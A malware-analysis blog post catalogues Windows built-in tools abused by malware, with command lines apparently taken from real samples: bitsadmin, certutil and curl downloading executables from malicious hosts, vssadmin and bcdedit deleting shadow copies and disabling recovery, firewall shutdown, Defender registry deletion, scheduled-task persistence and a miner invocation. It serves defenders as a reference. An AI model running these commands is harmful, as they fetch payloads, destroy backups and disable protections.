Home Malware Analysis: Common commands in malware
Post
Cancel

Malware Analysis: Common commands in malware

This example is all credit to Mastar fumik0 cause highlighted it at his blog. I’m just copy the content (make as a note) and improve it in terms of explanation and structure able to make me (or you guys) more understand the topic.

Lolbas website could help us alot to understand how some of prebuilt windows binary being abused by the attacker to conduct fileless or Living of the land attack.

attrib

Function: Used to display or change the file attributes for a file or folder. You can also find and set most file and folder attributes in Explorer. Malware used to hide their file using this command.

Reference: Microsoft attrib manual

Command line examples:

1
2
3
4
5
attrib +h "%APPDATA%\tmp_000"
attrib +r +a +s +h "%APPDATA%\Adobe Reader\ADBR\READER"
attrib +s +a %WINDIR%\Fonts
attrib +s +h +r "%APPDATA%\Process\*.*"
attrib -r -a -s -h -i /s C:\Users\%OSUSER%

autorun.exe

Function: A Win32 executable program intended for use with the Windows 95, 98, Me, NT4, 2000, and XP AutoRun facility. This facility (if enabled) will automatically run an executable as soon as a CD-ROM is inserted into the CD drive of the computer.

Command line examples:

1
autorun.exe "SFXSOURCE:%TEMP%\Temp\chewvga.EXE"

bcdedit

Function: Most ransomware use this command to remove Shadow Volume Copies and disable Windows automatic startup repair. It performs these commands to make it impossible to use the shadow volumes to recover your files.

Command line examples:

1
2
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled No

bitsadmin

Function: Used for managing background intelligent transfer. It can download, copy and execute executable by one line command.

Command line examples:

1
2
3
4
5
6
7
8
bitsadmin /complete QaeGF
bitsadmin /create /download QaeGF
bitsadmin /setcustomheaders QaeGF User-Agent:LACARNECOTTA
bitsadmin /transfer AE /priority foreground https://jgc.com.mx/dat/heavy.jpg %USERPROFILE%\document.exe
bitsadmin /Resume wstatus
bitsadmin /SetNotifyCmdLine wstatus "%ALLUSERSPROFILE%\Oracle\hok\jahok.exe" "update"
bitsadmin /cancel drp_bits_job
bitsadmin /transfer Nv /priority foreground http://154.16.201.215:2330/ari.exe %USERPROFILE%\RK.exe

calcs

Function: Displays or modifies discretionary access control lists (DACL) on specified files. An access control list is a list of permissions for securable object, such as a file or folder, that controls who can access it.

Command line examples:

1
2
cacls %ALLUSERSPROFILE%\expl0rer.exe /d everyone
cacls C:\Users\%OSUSER% /T /C /P %OSUSER% :F

certutil

Function: Windows binary used for handeling certificates. It can also use to download file from internet.

Command line examples:

1
2
3
4
5
6
7
certutil -addstore "Root" p.pem
certutil -addstore -f "TrustedPublisher" "%PROGRAMFILES%\OpenVPN Technologies\PrivateTunnel\Cert\OpenVPNTechForTap6.cer"
certutil -decode %TEMP%\B %TEMP%\y.bat
certutil -A -n "root" -t "TCu,Cuw,Tuw" -i "rootcert.cer" -d "%APPDATA%\Mozilla\Firefox\Profiles/fg6ygf16.default"
certutil -f -addStore root "%TEMP%\is-5OHTO.tmp\BaltimoreCyberTrustRoot.crt"
certutil -f -decode %ALLUSERSPROFILE%\Windows\Microsoft\java\dUpdateCheckers.base d.ps1
certutil -urlcache -split -f http://cache.windowsdefenderhost.com/windows/RecentFileProgrom.exe "C:\\Windows\\Fonts\\RecentFileProgrom.exe"

choice.exe

Function: Prompts the user to select one item from a list of single-character choices in a batch program, and then returns the index of the selected choice. If used without parameters, choice displays the default choices Y and N.

Command line examples:

1
2
choice /C Y /N /D Y /T 3
choice /t 3 /d y /n

cmstp.exe

Function: CMSTP is a binary which is associated with the Microsoft Connection Manager Profile Installer. It accepts INF files which can be weaponised with malicious commands in order to execute arbitrary code in the form of scriptlets (SCT) and DLL.

Reference: https://attack.mitre.org/techniques/T1191/

Command line examples:

1
2
cmstp.exe /s /ns "%APPDATA%\Microsoft\10850.txt"
cmstp.exe /s /su /ns df81c455-615e-4add-92e3-ce4a12d882d8.inf

conhost.exe

Function: Host process for the console window. The process sort of sits in the middle between CSRSS and the Command Prompt (cmd.exe)

Command line examples:

1
2
conhost.exe "-1036909723-245440756159895655010408828331479810903-3149622581357818589-674575599"
conhost.exe schtasks /create /tn "svchost" /tr "%WINDIR%\resources\svchost.exe" /sc daily /st 17:00 /f

csc.exe

Function: CSC stands for Visual C# [sharp] Command-Line Compiler.

Command line examples:

1
csc.exe /noconfig /fullpaths @"%TEMP%\-h_g5jfn.cmdline"

cscript

Function: Starts a script so that it runs in a command-line environment.

Command line examples:

1
2
cscript %TEMP%\file.vbs
cscript //nologo \\tK2PgXIebP\BIN\PreviousDate.vbs

csv.exe

Function: //will be add later

Command line examples:

1
2
csv.exe %TEMP%\83890727\AARIA
csv.exe dic=ngi

curl.exe

Function: A command line tool and library for transferring data with URLs.

Command line examples:

1
2
curl.exe -o new.exe http://down.pzchao.com:18559/new.exe
curl.exe -o pass32.exe http://down.pzchao.com:18559/pass32.exe -u 123:456

cvtres.exe

Function: Windows Resource to Object Converter. It is part of the C++ toolchain to turn resource files (.res) in to compiled objects that can be linked using the linker.

Command line examples:

1
cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES1055.tmp" "%TEMP%\CSC1036.tmp"

delete

Function: Delete file

Command line examples:

1
2
3
delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
delete HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v "Windows Defender" /f
delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v WindowsDefender /f

devcfg.exe

Function: //will be add later

Command line examples:

1
devcfg.exe -add net vnet %PROGRAMFILES%\ShrewSoft\VPN Client\drivers\virtualnet.inf

dllhost.exe

Function: COM Surrogate

Command line examples:

1
dllhost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}

dw20.exe

Function: The Windows Error Reporting tool, Dw20.exe, collects information automatically whenever an Office program stops responding.

Command line examples:

1
dw20.exe -x -s 1080

explorer.exe

Function: Windows shell

Command line examples:

1
2
explorer.exe /c, "%APPDATA%\Microsoft\Windows\Start Menu\Programs\scanned.exe"
explorer.exe schtasks /create /tn "svchost" /tr "%WINDIR%\resources\svchost.exe" /sc daily /st 14:59 /f

find

Function: built-in search capabilities

Command line examples:

1
2
3
4
5
find "."
find /i " "
find /i " 1"
find /i ".exe"
find /i "\\"

findstr

Function: It is used to search for a specific text string in computer files.

Command line examples:

1
2
3
4
findstr /i "ping"
findstr 0.0.0.0.*0.0.0.0
findstr [0-99]
findstr.exe findstr /C:"-"

icacls

Function: Displays or modifies discretionary access control lists (DACLs) on specified files, and applies stored DACLs to files in specified directories.

Command line examples:

1
icacls . /grant Everyone:F /T /C /Q

ipconfig

Function: Console application of some operating systems that displays all current TCP/IP network configuration values and refresh Dynamic Host Configuration Protocol (DHCP) and Domain Name System (DNS) settings.

Command line examples:

1
2
ipconfig /all
ipconfig /flushdns

javaw.exe

Function: The javaw.exe command is identical to java.exe, except that with javaw.exe there is no associated console window

Command line examples:

1
javaw.exe -jar "C:\07afffd621bd06f571b35fac6266abcec66ca8711102dd9a5e500ee897735190.jar"

mshta.exe

Function: A process which is a part of legitimate Microsoft HTML Application Host for Internet Explorer. This utility executes HTA or HTML files on Windows operating system.

Command line examples:

1
mshta.exe "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"

msiexec

Function: Provides the means to install, modify, and perform operations on Windows Installer from the command line.

Command line examples:

1
2
3
msiexec /i "%TEMP%\VCRedist\VCRedist_2005_x86\8.0.50727.6195\vcredist.msi" /qn
msiexec /quiet /uninstall {70895169-F9EC-432C-9FC9-4F4761019739}
msiexec /x "\\atbwfs100\Sourcing\Fit Tracking\03152007\FitTrackingUI.msi" /qn

net

Function: The net user command is used to add, delete, and otherwise manage the users on a computer.

Command line examples:

1
2
3
4
5
6
7
net config workstation
net localgroup "Remote Desktop Users" Matthew /add
net localgroup administrators Matthew /add
net session
net start "Data Sharing Service"
net stop TeamViewer
net stop osppsvc /y

netsh

Function: Netsh is a command-line scripting utility that allows you to display or modify the network configuration of a computer that is currently running.

Command line examples:

1
2
3
4
5
6
netsh advfirewall firewall add rule name="DriverPack aria2c.exe" dir=in action=allow program="%TEMP%\7ZipSfx.001\bin\tools\aria2c.exe"
netsh advfirewall set allprofiles state off
netsh advfirewall set allprofiles state on
netsh int ipv6 isatap show state
netsh int tcp reset
netsh int tcp set heuristics disabled

nslookup

Function: Displays information that you can use to diagnose Domain Name System (DNS) infrastructure.

Command line examples:

1
2
3
nslookup -q=txt djowy612ygosvyd.com 208.67.220.220
nslookup -type=a %OSUSER%.check.francefriends.tk.
nslookup ransomware.bit ns1.wowservers.ru

nssm.exe

Function: Nssm.exe launches the Non-Sucking Service Manager program. This is not an essential Windows process and can be disabled if known to create problems. NSSM is a free utility that manages background and foreground services and processes. The program can be set to automatically restart failing services.

Command line examples:

1
nssm.exe /install /silent "iSASService" %PROGRAMFILES%\Java\jre1.8.0_25\bin\java.exe

ping

Function: Computer network administration software utility used to test the reachability of a host on an Internet Protocol network.

Command line examples:

1
2
3
4
5
ping -n 0 localhost
ping -n 1 127.0.0.1
ping -n 2 -w 1000 127.0.0.1
ping -t 2 -l 10 127.0.0.1
ping google.com

powershell.exe

Function: PowerShell is a task automation and configuration management framework from Microsoft, consisting of a command-line shell and the associated scripting language.

Command line examples:

1
powershell.exe "-file" "C:\01674bf1099edd830c974553a4de062f42c5e6759adb6b4da7aadfdd838cc00c.ps1"

reg

Function: Performs operations on registry subkey information and values in registry entries. Some operations enable you to view or configure registry entries on local or remote computers, while others allow you to configure only local computers. Using reg to configure the registry of remote computers limits the parameters that you can use in some operations.

Command line examples:

1
2
3
4
reg delete "HKCU\Software\Microsoft\Office\12.0\Word\Resiliency" /F
reg delete "HKCU\Software\Microsoft\Office\15.0\Word\Resiliency" /F
reg import %TEMP%\7ZipSfx.001\bin\Tools\\patch.reg
reg query "HKCU\Control Panel\International" /v sShortDate

regsvr32.exe

Function: Regsvr32 is a command-line utility to register and unregister OLE controls, such as DLLs and ActiveX controls in the Windows Registry.

Command line examples:

1
regsvr32.exe /n /s "%TEMP%\instx86.tmp" /i:"/cp"

rundll32.exe

Function: Loads and runs 32-bit dynamic-link libraries (DLLs).

Command line examples:

1
2
3
rundll32.exe %APPDATA%\ekcwlvi.dll f1
rundll32.exe %WINDIR%\system32\shell32.dll,OpenAs_RunDLL %TEMP%\rad3FE20.tmp
rundll32.exe shell32.dll,Control_RunDLL input.dll

sc.exe

Function: Creates a subkey and entries for a service in the registry and in the Service Control Manager database.

Command line examples:

1
2
3
sc.exe delete TeamViewer
sc.exe start TeamViewer
sc.exe stop TeamViewer

schtasks.exe

Function: Schedules commands and programs to run periodically or at a specific time, adds and removes tasks from the schedule, starts and stops tasks on demand, and displays and changes scheduled tasks.

Command line examples:

1
2
3
4
5
6
7
8
9
10
11
12
13
schtasks /create /sc minute /mo 1 /tn "HomeGroupProvider" /ru system /tr "cmd /c echo Y|cacls %WINDIR%\sxstruse.exe /p everyone:F"
schtasks.exe "schtasks" /create /tn "NRAT Client Startup" /sc ONLOGON /tr "%APPDATA%\Google\chrome.exe" /rl HIGHEST /f
schtasks.exe "schtasks" /create /tn "Windows© " /sc ONLOGON /tr "%APPDATA%\winfile\Microsoft©.exe" /rl HIGHEST /f
schtasks.exe "schtasks" /delete /tn "WebDiscover Browser Launch Task" /f
schtasks.exe /Create /RU system /SC ONLOGON /TN Microsoft\WindowsDifenderUpdate /TR "wscript %ALLUSERSPROFILE%\WindowsNT\WindowsNT.vbs" /F
schtasks.exe schtasks /delete /tn "Adobe Flash Player Updaters" /f
schtasks.exe schtasks /delete /tn "Microsoft\Windows\orangeinside" /f
schtasks.exe schtasks /delete /tn "Printerceptor" /f
schtasks.exe schtasks /delete /tn "\Microsoft\Windows\WDI\Adobe\Adobe Flash Updaters" /f
schtasks.exe schtasks /delete /tn 360 /f
schtasks.exe schtasks /delete /tn AutoKMSK /f
schtasks.exe schtasks /delete /tn AutoKMSKK /f
schtasks.exe schtasks /delete /tn SogouImeMgr /f

shutdown

Function: Enables you to shut down or restart local or remote computers, one at a time.

Command line examples:

1
2
3
4
5
6
shutdown /p /f
shutdown -a
shutdown -r -f -t 5
shutdown -s -f -t 0
shutdown -s -t 100
shutdown /s /t 600 /f

ssh-keygen.exe

Function: The ssh-keygen utility is used to generate, manage, and convert authentication keys.

Command line examples:

1
ssh-keygen.exe -b 1024 -t dsa -f /ssh_host_dsa_key -N ""

subst.exe

Function: Associates a path with a drive letter. If used without parameters, subst displays the names of the virtual drives in effect.

Command line examples:

1
subst.exe subst b: C:\

svchost.exe

Function: Svchost.exe is a generic host process name for services that run from dynamic-link libraries.

Command line examples:

1
svchost.exe -k

takeown

Function: Enables an administrator to recover access to a file that previously was denied, by making the administrator the owner of the file. This command is typically used on batch files.

Command line examples:

1
takeown /f %WINDIR%\system32\Drivers\etc\hosts /a

taskkill

Function: Ends one or more tasks or processes. Processes can be ended by process ID or image name.

Command line examples:

1
taskkill /im rundll32.exe /f /T

tasklist

Function: Displays a list of currently running processes on the local computer or on a remote computer.

Command line examples:

1
tasklist /nh /fi "imagename eq .exe"

timeout

Function: Pauses the command processor for the specified number of seconds.

Command line examples:

1
2
timeout /t 1 /nobreak
timeout /t 300

vbc.exe

Function: Compile file to executable (.exe) files or dynamic-link library (.dll) files

Command line examples:

1
2
3
4
vbc.exe -o xmr.pool.minergate.com:45700 -u 1LwkS2UaXY5hrRxR7Kdxo625v41zeHGjxL --cpu-priority 3 --max-cpu-usage 75 --donate-level 1 -p x -t 2
vbc.exe /noconfig @"%TEMP%\apzjg8gs.cmdline"
vbc.exe /shtml "%TEMP%\v0xrvacf.goc"
vbc.exe /stext "%TEMP%\holdermail.txt"

vssadmin

Function: Displays current volume shadow copy backups and all installed shadow copy writers and providers.

Command line examples:

1
2
3
vssadmin Delete Shadows /All /Quiet
vssadmin delete shadows /all
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

wget.exe

Function: Download file

Command line examples:

1
wget.exe http://127.0.0.1:9527 -o "C:\\TestWget.txt" -t 1

wmic

Function: The WMI command-line (WMIC) utility provides a command-line interface for Windows Management Instrumentation (WMI).

Command line examples:

1
2
3
4
5
6
7
8
9
10
wmic /node:localhost /namespace:\\root\SecurityCenter2 path FirewallProduct get /format:list
wmic OS get Caption /value
wmic PAGEFILESET GET MaximumSize /value
wmic computersystem get domain
wmic logicaldisk where "DeviceID='C:'" get size
wmic nicconfig where(ipenabled=true) get index
wmic path Win32_Processor get Name /value
wmic path Win32_Processor get NumberOfCores /value
wmic process where "name='conhost.exe' and ExecutablePath='C:\\windows\\Installer\\conhost.exe'" call Terminate
wmic shadowcopy delete

wscript

Function: Windows Script Host provides an environment in which users can execute scripts in a variety of languages that use a variety of object models to perform tasks.

Command line examples:

1
2
3
4
wscript //Nologo "%PUBLIC%\Temp\%OSUSER%.vbs" CxNqfVybn9rBTqHTjjIhA3jiooCiJP5DlgROv3L5qhFsDi4GcAM
wscript /b %ALLUSERSPROFILE%\Windows\Microsoft\java\GoogleUpdateschecker.vbs
wscript /e:VBScript.Encode %TEMP%\SysinfY2X.db
wscript bnbgpnhp.js

xcopy

Function: Copies files and directories, including subdirectories.

Command line examples:

1
2
3
xcopy /l /w "%TEMP%\4064BQBC.bat" "%TEMP%\4064BQBC.bat"
xcopy /Y /I /S "%TEMP%\NS-1Q8EJ.tmp\tmp\*" "%TEMP%\nsa694.tmp\"
xcopy /Y /I /S "%TEMP%\NS-2QOKH.tmp\tmp\*" "%TEMP%\nsa796.tmp\"
This post is licensed under CC BY 4.0 by the author.